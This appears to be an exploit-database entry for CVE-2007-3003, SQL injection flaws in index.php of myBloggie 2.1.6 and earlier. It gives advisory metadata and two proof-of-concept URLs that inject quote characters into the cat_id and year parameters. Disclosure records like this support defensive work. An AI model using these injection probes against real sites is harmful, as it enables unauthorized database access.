MyBloggie 2.1.x - 'index.php' Multiple SQL Injections
Author: ls@calima.serapis.net
type: webapps
platform: php
port:
date_added: 2007-05-31
date_updated: 2013-12-08
verified: 1
codes: CVE-2007-3003;OSVDB-38345
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/24249/info
myBloggie is prone to an SQL-injection vulnerability.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
This issue affects myBloggie 2.1.6 and earlier.
http://www.example.com/apppath/index.php?mode=viewuser&cat_id='
http://www.example.com/apppath/index.php?mode=viewuser&month_no=4&year="